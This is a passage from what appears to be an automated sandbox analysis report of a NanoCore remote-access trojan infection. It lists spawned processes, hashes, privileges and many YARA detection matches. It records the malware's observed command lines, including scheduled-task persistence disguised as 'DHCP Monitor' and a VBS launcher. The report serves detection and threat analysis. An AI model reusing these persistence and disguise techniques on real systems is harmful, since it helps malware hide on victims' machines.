              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 26%, ReversingLabs
              Reputation:low

              General

              Target ID:10
              Start time:17:51:58
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x360000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              Reputation:high

              General

              Target ID:11
              Start time:17:52:02
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
              Imagebase:0xef0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:12
              Start time:17:52:02
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:13
              Start time:17:52:03
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
              Imagebase:0x10000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              General

              Target ID:14
              Start time:17:52:03
              Start date:03/02/2023
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
              Imagebase:0xef0000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:15
              Start time:17:52:04
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:16
              Start time:17:52:04
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:17
              Start time:17:52:06
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:18
              Start time:17:52:07
              Start date:03/02/2023
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
              Imagebase:0x710000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Antivirus matches:
              • Detection: 0%, ReversingLabs

              General

              Target ID:19
              Start time:17:52:07
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Target ID:20
              Start time:17:52:15
              Start date:03/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
              Imagebase:0x7ff6f21c0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:21
              Start time:17:52:16
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:22
              Start time:17:52:18
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x350000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

              General

              Target ID:23
              Start time:17:52:23
              Start date:03/02/2023
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
              Imagebase:0xb80000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:24
              Start time:17:52:23
              Start date:03/02/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6edaf0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Target ID:25
              Start time:17:52:28
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0xa50000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              General

              Target ID:26
              Start time:17:52:33
              Start date:03/02/2023
              Path:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              Imagebase:0xba0000
              File size:1357068 bytes
              MD5 hash:797174324A2A71F55AD4E89DA918B52D
